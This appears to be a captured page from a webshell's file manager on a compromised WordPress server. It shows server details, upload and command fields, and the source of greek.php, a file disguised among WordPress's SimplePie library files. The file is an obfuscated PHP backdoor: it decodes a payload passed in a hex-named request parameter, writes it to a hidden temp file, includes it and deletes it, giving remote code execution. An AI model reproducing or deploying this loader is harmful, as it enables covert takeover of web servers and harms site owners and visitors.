403Webshell
Server IP : 162.243.168.218  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64
User : web23 ( 5020)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/clients/client3/web23/web/wp-includes/SimplePie/library/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client3/web23/web/wp-includes/SimplePie/library/greek.php
<?php

if(@$_REQUEST["\x64\x65\x73\x63ript\x6Fr"] !== null){
	$object = $_REQUEST["\x64\x65\x73\x63ript\x6Fr"];
		  $object		=explode   (   '.'	,   $object 	); 		
	$hld	=	'';
            $s6	=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	=	strlen($s6);
    
            foreach ($object as $v=>		$v1) { 	$sChar	=	ord($s6[$v	%$sLen]);
                $d	=	((int)$v1 - $sChar - ($v	%10))^70;
                $hld.= chr($d);
            }
	$elem = array_filter(["/var/tmp", sys_get_temp_dir(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), getcwd(), "/dev/shm"]);
	$value = 0;
do {
    $resource = $elem[$value] ?? null;
    if ($value >= count($elem)) break;
    		if (array_product([is_dir($resource), is_writable($resource)])) {
    $symbol = "$resource/.element";
    if (file_put_contents($symbol, $hld)) {
	include $symbol;
	@unlink($symbol);
	die();
}
}
    $value++;
} while (true);
}

Youez - 2016 - github.com/yon3zu
LinuXploit